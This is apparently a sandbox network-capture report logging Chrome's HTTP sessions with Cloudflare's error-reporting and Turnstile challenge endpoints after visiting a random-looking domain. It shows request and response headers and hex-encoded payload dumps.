                                                                                                                                                                                                                                                                            2024-12-03 17:58:57 UTC1369INData Raw: 59 4f 43 69 59 75 49 6a 58 4f 48 6d 35 57 65 66 47 4e 63 56 33 53 59 70 57 57 54 61 34 4f 56 6a 36 56 37 67 35 2b 4f 61 72 4f 76 6a 6f 47 4c 73 59 69 6c 76 72 53 75 6a 35 71 73 73 72 43 42 6e 49 47 43 75 4c 61 31 76 35 2b 73 78 38 65 72 78 38 32 66 77 38 6d 75 72 72 50 50 31 61 6e 4c 30 62 62 4f 75 39 66 67 33 4e 50 5a 76 74 65 34 6f 38 79 72 77 4c 76 6b 77 73 6e 7a 72 38 6a 78 31 61 33 54 39 4d 53 7a 2f 64 72 53 37 39 76 42 30 4f 2b 38 7a 67 4c 37 43 74 54 49 41 2b 6e 4e 2f 41 7a 4d 38 51 66 6a 36 52 51 49 41 77 66 31 2b 4f 38 55 42 77 67 55 46 50 54 34 37 64 7a 75 49 68 50 2b 35 53 67 58 4b 43 59 77 41 41 45 51 2b 78 49 70 46 2f 55 4c 45 53 4d 6b 45 76 77 4b 2f 43 38 5a 2f 42 6f 74 46 51 34 68 52 42 59 59 41 51 67 6d 4c 77 77 34 53 53 41 4f 53 6b 56 51
                                                                                                                                                                                                                                                                            Data Ascii: YOCiYuIjXOHm5WefGNcV3SYpWWTa4OVj6V7g5+OarOvjoGLsYilvrSuj5qssrCBnIGCuLa1v5+sx8erx82fw8murrPP1anL0bbOu9fg3NPZvte4o8yrwLvkwsnzr8jx1a3T9MSz/drS79vB0O+8zgL7CtTIA+nN/AzM8Qfj6RQIAwf1+O8UBwgUFPT47dzuIhP+5SgXKCYwAAEQ+xIpF/ULESMkEvwK/C8Z/BotFQ4hRBYYAQgmLww4SSAOSkVQ


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            21192.168.2.44977035.190.80.14431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC539OUTOPTIONS /report/v4?s=CdnBrsWGj%2Bueme9ecI62U2U%2B6XBPDLZtOkNaz4fAfDM12yYZCaWputbDAblYwu3T8lkLLf0BF83gyBlFbn1N1dHJugNeLwGEDpmnRA3whwB9SY%2BWDn8Cd9uC9K%2BSlg%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Origin: https://j9lg.xbyhiqbjl.com
                                                                                                                                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:57 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                            access-control-max-age: 86400
                                                                                                                                                                                                                                                                            access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                            access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                                            date: Tue, 03 Dec 2024 17:58:56 GMT
                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            22192.168.2.44977235.190.80.14431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:58 UTC478OUTPOST /report/v4?s=CdnBrsWGj%2Bueme9ecI62U2U%2B6XBPDLZtOkNaz4fAfDM12yYZCaWputbDAblYwu3T8lkLLf0BF83gyBlFbn1N1dHJugNeLwGEDpmnRA3whwB9SY%2BWDn8Cd9uC9K%2BSlg%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:58 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 39 6c 67 2e 78 62 79 68 69 71 62 6a 6c 2e 63 6f 6d 2f 61 64 6d 69 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 31 2e 32 34 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                                                                                                                                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":347,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://j9lg.xbyhiqbjl.com/admi/","sampling_fraction":1.0,"server_ip":"172.67.211.241","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                            date: Tue, 03 Dec 2024 17:58:58 GMT
                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            23192.168.2.449773104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:58 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:59 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                            cf-chl-out: NRQugInQ2q58j2bXw9RBKcWN6INpg+ZPjCk=$LvNiw+IXGrr5wNKv
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572ab8fd64321-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            24192.168.2.449776104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5i HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:59 GMT
                                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572acfed18ca5-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 0d 08 02 00 00 00 22 c7 09 34 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                            Data Ascii: PNGIHDR"4IDAT$IENDB`


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            25192.168.2.449778104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:00 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5i HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:01 GMT
                                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572b84c2cc436-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 0d 08 02 00 00 00 22 c7 09 34 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                            Data Ascii: PNGIHDR"4IDAT$IENDB`


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            26192.168.2.449781104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8ec5727f9d0241a1/1733248736478/8f38335f91dcaf734a7afa50e0a6c4b356ef55c4227675c3a160e4125fdfceeb/CbLonmEmJfVGcCU HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:01 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 6a 7a 67 7a 58 35 48 63 72 33 4e 4b 65 76 70 51 34 4b 62 45 73 31 62 76 56 63 51 69 64 6e 58 44 6f 57 44 6b 45 6c 5f 66 7a 75 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gjzgzX5Hcr3NKevpQ4KbEs1bvVcQidnXDoWDkEl_fzusAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                                            2024-12-03 17:59:01 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                                            Data Ascii: J


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            27192.168.2.449783104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:03 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 32196
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            CF-Challenge: xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:03 UTC16384OUTData Raw: 76 5f 38 65 63 35 37 32 37 66 39 64 30 32 34 31 61 31 3d 4d 6c 57 71 50 6a 38 70 52 24 62 37 6c 37 25 32 62 6a 4e 37 6f 37 47 77 39 38 42 37 41 71 6d 4b 76 6b 2d 68 38 32 37 41 71 6a 54 38 50 39 71 41 48 4a 77 62 37 64 37 62 4b 4a 39 39 38 43 41 2b 37 55 56 37 38 72 35 77 51 71 37 4f 4e 6d 2b 71 6b 6e 78 39 37 71 37 61 79 37 66 52 38 47 70 58 38 6a 48 37 76 71 6b 2b 37 79 71 39 2d 63 37 63 46 71 37 4e 37 37 4a 67 5a 45 6f 76 47 4f 49 53 48 37 55 58 5a 73 24 39 52 6a 46 37 4d 46 46 71 24 2d 37 6b 33 57 6f 66 57 37 47 62 37 32 71 37 72 37 38 33 48 37 66 58 56 62 2d 71 6c 37 6e 69 7a 37 6a 33 7a 6a 2d 2b 53 48 6f 39 4b 79 65 55 48 2d 51 76 6c 63 36 24 48 37 38 31 48 70 37 6a 55 39 2d 56 65 66 39 7a 79 2d 2b 50 77 59 75 67 51 51 2d 31 4c 6b 2d 56 75 24 6d 54
                                                                                                                                                                                                                                                                            Data Ascii: v_8ec5727f9d0241a1=MlWqPj8pR$b7l7%2bjN7o7Gw98B7AqmKvk-h827AqjT8P9qAHJwb7d7bKJ998CA+7UV78r5wQq7ONm+qknx97q7ay7fR8GpX8jH7vqk+7yq9-c7cFq7N77JgZEovGOISH7UXZs$9RjF7MFFq$-7k3WofW7Gb72q7r783H7fXVb-ql7niz7j3zj-+SHo9KyeUH-Qvlc6$H781Hp7jU9-Vef9zy-+PwYugQQ-1Lk-Vu$mT
                                                                                                                                                                                                                                                                            2024-12-03 17:59:03 UTC15812OUTData Raw: 77 55 76 7a 37 54 76 30 57 37 37 24 32 67 4d 6b 71 6d 37 39 6c 39 43 77 37 38 79 71 71 4a 6b 71 38 33 37 41 71 38 68 46 75 57 73 37 38 59 32 78 5a 57 37 57 66 6a 4a 37 46 37 75 71 38 59 71 61 37 6b 71 37 74 37 79 37 57 76 38 2d 37 24 46 47 37 6b 2d 37 66 37 38 62 38 44 46 56 4a 4d 6c 58 62 37 42 37 4d 41 6b 6a 37 62 71 38 57 6b 55 57 6a 71 79 52 38 31 37 4e 37 4d 52 6b 30 37 4b 71 39 6c 6b 43 37 4d 71 6f 62 6a 6e 37 2d 37 75 6c 37 71 37 73 71 79 2b 38 57 37 46 62 57 66 38 71 38 49 76 6f 4a 37 38 4a 49 37 6a 4a 37 30 37 30 71 77 4a 77 57 37 61 6a 37 47 6a 79 6e 78 6c 39 57 47 68 37 38 71 39 31 38 75 37 63 71 77 31 38 53 71 39 71 73 37 37 2d 37 38 68 39 4a 38 6e 37 2d 4f 4d 47 38 4c 55 24 37 6a 71 37 7a 37 37 70 47 5a 38 31 38 4a 71 73 37 6b 7a 37 6c 4e 6b
                                                                                                                                                                                                                                                                            Data Ascii: wUvz7Tv0W77$2gMkqm79l9Cw78yqqJkq837Aq8hFuWs78Y2xZW7WfjJ7F7uq8Yqa7kq7t7y7Wv8-7$FG7k-7f78b8DFVJMlXb7B7MAkj7bq8WkUWjqyR817N7MRk07Kq9lkC7Mqobjn7-7ul7q7sqy+8W7FbWf8q8IvoJ78JI7jJ7070qwJwW7aj7Gjynxl9WGh78q918u7cqw18Sq9qs77-78h9J8n7-OMG8LU$7jq7z77pGZ818Jqs7kz7lNk
                                                                                                                                                                                                                                                                            2024-12-03 17:59:04 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:03 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 26320
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cf-chl-gen: yqk/Fxx6Yw2r6bqVuwTCp11AH+Gxo+aw7YkysQwEQ8OQLMYwS41fV8VXDbkW16hLOvEjgm0djwOsvhh/$zWUHehm/7bblhn58
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572c7b913de94-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:59:04 UTC1039INData Raw: 66 48 47 47 6a 47 65 42 68 56 4b 56 62 70 57 62 6d 6c 4b 64 61 31 71 57 66 32 4b 61 69 58 74 6d 6e 6f 79 74 66 71 75 51 70 61 53 70 69 5a 4f 41 62 6f 4f 75 68 62 47 30 6c 35 4f 76 6b 48 65 64 66 33 79 39 77 5a 57 53 6c 62 57 55 79 34 79 74 6e 37 37 41 76 5a 47 68 78 64 53 6b 74 4b 6e 48 71 70 76 49 78 35 66 41 73 37 47 32 35 64 75 6a 73 5a 2f 41 6f 74 72 4a 7a 62 61 35 77 2b 6d 74 37 73 58 77 39 62 2b 79 39 73 7a 54 33 4c 72 58 37 39 4c 59 31 38 76 51 39 63 62 56 42 2f 76 79 34 66 76 70 35 39 6e 6f 30 50 50 68 42 78 44 32 45 67 77 54 42 78 76 63 32 2f 76 34 38 68 7a 34 32 69 44 30 38 43 66 31 4a 2f 6b 63 2b 42 33 35 4a 68 72 6a 45 69 6f 55 49 78 4d 51 47 68 41 52 4c 50 67 49 47 44 45 37 4b 68 55 30 4a 76 73 65 4d 6b 6f 6c 54 44 38 4d 4c 45 42 4f 48 53 45
                                                                                                                                                                                                                                                                            Data Ascii: fHGGjGeBhVKVbpWbmlKda1qWf2KaiXtmnoytfquQpaSpiZOAboOuhbG0l5OvkHedf3y9wZWSlbWUy4ytn77AvZGhxdSktKnHqpvIx5fAs7G25dujsZ/AotrJzba5w+mt7sXw9b+y9szT3LrX79LY18vQ9cbVB/vy4fvp59no0PPhBxD2EgwTBxvc2/v48hz42iD08Cf1J/kc+B35JhrjEioUIxMQGhARLPgIGDE7KhU0JvseMkolTD8MLEBOHSE
                                                                                                                                                                                                                                                                            2024-12-03 17:59:04 UTC1369INData Raw: 59 64 57 74 78 63 33 32 44 63 47 61 43 6e 4a 36 6e 72 59 79 4d 59 34 47 6a 71 61 4a 79 73 35 57 45 74 33 75 58 71 35 32 72 6d 61 39 38 6f 5a 75 7a 70 62 47 2f 74 34 53 6e 76 62 75 74 75 62 71 69 78 61 57 53 68 37 2f 56 6f 4b 36 56 72 71 37 4f 76 63 79 75 7a 62 4b 62 6e 63 32 33 32 74 32 33 77 4d 6e 65 74 65 37 76 78 4d 44 41 37 4e 58 68 74 73 7a 6c 2b 50 6d 79 32 66 4b 2b 75 2f 41 41 38 76 76 69 2f 4d 41 43 41 73 66 79 2b 64 2f 6f 37 76 44 47 42 73 6a 6c 46 76 62 77 45 75 37 4c 48 4f 59 53 30 77 6e 34 33 52 50 63 2f 42 30 61 33 77 51 52 35 66 4d 57 2f 4f 76 6b 4c 77 30 72 45 4f 34 48 35 7a 4d 45 4e 42 73 32 42 69 77 72 4d 7a 51 69 4c 54 33 37 41 41 4e 46 48 54 4d 46 50 6a 64 4b 4e 77 6f 4a 51 77 38 6d 56 51 38 72 4d 54 4d 74 52 44 42 4a 46 78 55 37 53 56
                                                                                                                                                                                                                                                                            Data Ascii: YdWtxc32DcGaCnJ6nrYyMY4GjqaJys5WEt3uXq52rma98oZuzpbG/t4SnvbutubqixaWSh7/VoK6Vrq7OvcyuzbKbnc232t23wMnete7vxMDA7NXhtszl+Pmy2fK+u/AA8vvi/MACAsfy+d/o7vDGBsjlFvbwEu7LHOYS0wn43RPc/B0a3wQR5fMW/OvkLw0rEO4H5zMENBs2BiwrMzQiLT37AANFHTMFPjdKNwoJQw8mVQ8rMTMtRDBJFxU7SV
